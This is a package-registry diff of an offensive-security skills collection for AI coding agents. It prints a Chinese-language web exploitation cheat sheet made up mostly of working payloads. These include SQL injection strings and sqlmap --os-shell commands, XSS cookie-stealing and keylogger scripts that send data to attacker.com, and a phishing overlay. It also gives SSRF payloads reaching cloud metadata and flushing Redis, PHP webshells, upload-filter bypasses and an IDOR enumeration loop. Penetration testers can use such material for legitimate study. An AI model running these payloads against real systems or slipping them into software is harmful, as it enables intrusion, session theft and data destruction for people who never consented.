opencode-skills-collection 4.0.43 → 4.0.45
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +47 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1214 -2
|
@@ -0,0 +1,387 @@
|
|
|
1
|
+
# Web 漏洞利用速查
|
|
2
|
+
|
|
3
|
+
> 覆盖 OWASP Top 10 + 实战高频漏洞。每个漏洞类型包含:原理、检测方法、利用 payload、防御建议。
|
|
4
|
+
> 配合 pentest-tools 的 MCP 工具链使用。
|
|
5
|
+
|
|
6
|
+
---
|
|
7
|
+
|
|
8
|
+
## SQL 注入
|
|
9
|
+
|
|
10
|
+
### 检测
|
|
11
|
+
|
|
12
|
+
```bash
|
|
13
|
+
# 基础检测
|
|
14
|
+
' OR 1=1--
|
|
15
|
+
" OR 1=1--
|
|
16
|
+
1' AND '1'='1
|
|
17
|
+
1' AND '1'='2 # 对比响应差异
|
|
18
|
+
|
|
19
|
+
# 时间盲注检测
|
|
20
|
+
1' AND SLEEP(5)--
|
|
21
|
+
1' AND IF(1=1,SLEEP(5),0)--
|
|
22
|
+
|
|
23
|
+
# 报错注入检测
|
|
24
|
+
1' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
|
|
25
|
+
```
|
|
26
|
+
|
|
27
|
+
### SQLMap 自动化
|
|
28
|
+
|
|
29
|
+
```bash
|
|
30
|
+
# 基础扫描
|
|
31
|
+
sqlmap -u "http://target/page?id=1" --batch --dbs
|
|
32
|
+
|
|
33
|
+
# POST 请求
|
|
34
|
+
sqlmap -u "http://target/login" --data="user=admin&pass=test" --batch
|
|
35
|
+
|
|
36
|
+
# Cookie 注入
|
|
37
|
+
sqlmap -u "http://target/page" --cookie="id=1*" --batch
|
|
38
|
+
|
|
39
|
+
# 指定注入点
|
|
40
|
+
sqlmap -u "http://target/page" --data="a=1&b=2*&c=3" --batch
|
|
41
|
+
|
|
42
|
+
# 绕过 WAF
|
|
43
|
+
sqlmap -u "http://target/page?id=1" --tamper=space2comment,between --random-agent
|
|
44
|
+
|
|
45
|
+
# 获取 shell
|
|
46
|
+
sqlmap -u "http://target/page?id=1" --os-shell
|
|
47
|
+
```
|
|
48
|
+
|
|
49
|
+
### 常用 Tamper 脚本
|
|
50
|
+
|
|
51
|
+
| Tamper | 作用 |
|
|
52
|
+
|--------|------|
|
|
53
|
+
| `space2comment` | 空格替换为 `/**/` |
|
|
54
|
+
| `between` | `>` 替换为 `BETWEEN` |
|
|
55
|
+
| `randomcase` | 关键字随机大小写 |
|
|
56
|
+
| `charencode` | URL 编码 |
|
|
57
|
+
| `equaltolike` | `=` 替换为 `LIKE` |
|
|
58
|
+
| `base64encode` | Base64 编码 payload |
|
|
59
|
+
|
|
60
|
+
---
|
|
61
|
+
|
|
62
|
+
## XSS(跨站脚本)
|
|
63
|
+
|
|
64
|
+
### 检测 Payload
|
|
65
|
+
|
|
66
|
+
```html
|
|
67
|
+
<!-- 反射型 -->
|
|
68
|
+
<script>alert(1)</script>
|
|
69
|
+
<img src=x onerror=alert(1)>
|
|
70
|
+
<svg onload=alert(1)>
|
|
71
|
+
"><script>alert(1)</script>
|
|
72
|
+
'><img src=x onerror=alert(1)>
|
|
73
|
+
|
|
74
|
+
<!-- DOM 型 -->
|
|
75
|
+
javascript:alert(1)
|
|
76
|
+
#<img src=x onerror=alert(1)>
|
|
77
|
+
|
|
78
|
+
<!-- 存储型 -->
|
|
79
|
+
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
|
|
80
|
+
|
|
81
|
+
<!-- 绕过过滤 -->
|
|
82
|
+
<ScRiPt>alert(1)</ScRiPt>
|
|
83
|
+
<img src=x onerror="alert(1)">
|
|
84
|
+
<img src=x onerror=alert`1`>
|
|
85
|
+
<svg/onload=alert(1)>
|
|
86
|
+
<body onload=alert(1)>
|
|
87
|
+
```
|
|
88
|
+
|
|
89
|
+
### XSS 利用
|
|
90
|
+
|
|
91
|
+
```javascript
|
|
92
|
+
// Cookie 窃取
|
|
93
|
+
new Image().src="https://attacker.com/steal?c="+document.cookie;
|
|
94
|
+
|
|
95
|
+
// Keylogger
|
|
96
|
+
document.onkeypress=function(e){
|
|
97
|
+
new Image().src="https://attacker.com/log?k="+e.key;
|
|
98
|
+
}
|
|
99
|
+
|
|
100
|
+
// 页面劫持
|
|
101
|
+
document.body.innerHTML='<h1>Session Expired</h1><form action="https://attacker.com/phish"><input name="user"><input name="pass" type="password"><button>Login</button></form>';
|
|
102
|
+
```
|
|
103
|
+
|
|
104
|
+
---
|
|
105
|
+
|
|
106
|
+
## SSRF(服务端请求伪造)
|
|
107
|
+
|
|
108
|
+
### 检测
|
|
109
|
+
|
|
110
|
+
```text
|
|
111
|
+
# 内网探测
|
|
112
|
+
http://127.0.0.1:80
|
|
113
|
+
http://localhost:22
|
|
114
|
+
http://[::1]:80
|
|
115
|
+
http://0x7f000001:80
|
|
116
|
+
|
|
117
|
+
# 云元数据
|
|
118
|
+
http://169.254.169.254/latest/meta-data/ (AWS)
|
|
119
|
+
http://metadata.google.internal/ (GCP)
|
|
120
|
+
http://169.254.169.254/metadata/instance (Azure)
|
|
121
|
+
|
|
122
|
+
# 协议利用
|
|
123
|
+
file:///etc/passwd
|
|
124
|
+
dict://127.0.0.1:6379/INFO
|
|
125
|
+
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
### 绕过技巧
|
|
129
|
+
|
|
130
|
+
```text
|
|
131
|
+
# IP 绕过
|
|
132
|
+
http://0177.0.0.1 (八进制)
|
|
133
|
+
http://2130706433 (十进制)
|
|
134
|
+
http://0x7f.0x0.0x0.0x1 (十六进制)
|
|
135
|
+
http://127.1 (短格式)
|
|
136
|
+
http://127.0.0.1.nip.io (DNS 重绑定)
|
|
137
|
+
|
|
138
|
+
# URL 绕过
|
|
139
|
+
http://attacker.com@127.0.0.1
|
|
140
|
+
http://127.0.0.1#@allowed.com
|
|
141
|
+
http://127.0.0.1%2523@allowed.com
|
|
142
|
+
|
|
143
|
+
# 重定向绕过
|
|
144
|
+
http://allowed.com/redirect?url=http://127.0.0.1
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
---
|
|
148
|
+
|
|
149
|
+
## 文件上传漏洞
|
|
150
|
+
|
|
151
|
+
### 绕过方法
|
|
152
|
+
|
|
153
|
+
| 检测方式 | 绕过方法 |
|
|
154
|
+
|---------|---------|
|
|
155
|
+
| 后缀名黑名单 | `.php5`、`.phtml`、`.pHp`、`.php.jpg` |
|
|
156
|
+
| Content-Type 检查 | 修改为 `image/jpeg` |
|
|
157
|
+
| 文件头检查 | 在 webshell 前加 `GIF89a` |
|
|
158
|
+
| 文件大小限制 | 压缩 payload |
|
|
159
|
+
| 图片二次渲染 | 在不被修改的区域插入代码 |
|
|
160
|
+
| .htaccess 限制 | 上传 `.htaccess` 修改解析规则 |
|
|
161
|
+
|
|
162
|
+
### Webshell Payload
|
|
163
|
+
|
|
164
|
+
```php
|
|
165
|
+
<?php system($_GET['cmd']); ?>
|
|
166
|
+
<?php eval($_POST['x']); ?>
|
|
167
|
+
<?=`$_GET[0]`?>
|
|
168
|
+
|
|
169
|
+
<!-- 图片马 -->
|
|
170
|
+
GIF89a<?php system($_GET['cmd']); ?>
|
|
171
|
+
```
|
|
172
|
+
|
|
173
|
+
---
|
|
174
|
+
|
|
175
|
+
## IDOR(不安全的直接对象引用)
|
|
176
|
+
|
|
177
|
+
### 测试方法
|
|
178
|
+
|
|
179
|
+
```bash
|
|
180
|
+
# 水平越权
|
|
181
|
+
GET /api/users/1001/profile # 自己的
|
|
182
|
+
GET /api/users/1002/profile # 别人的 → 应该 403
|
|
183
|
+
|
|
184
|
+
# 垂直越权
|
|
185
|
+
GET /api/admin/users # 普通用户访问管理接口
|
|
186
|
+
|
|
187
|
+
# 参数篡改
|
|
188
|
+
POST /api/orders/cancel {"order_id": "OTHER_USER_ORDER"}
|
|
189
|
+
|
|
190
|
+
# ID 遍历
|
|
191
|
+
for id in $(seq 1 1000); do
|
|
192
|
+
curl -s -H "Auth: TOKEN" "https://api.target.com/users/$id" | grep -v "403"
|
|
193
|
+
done
|
|
194
|
+
```
|
|
195
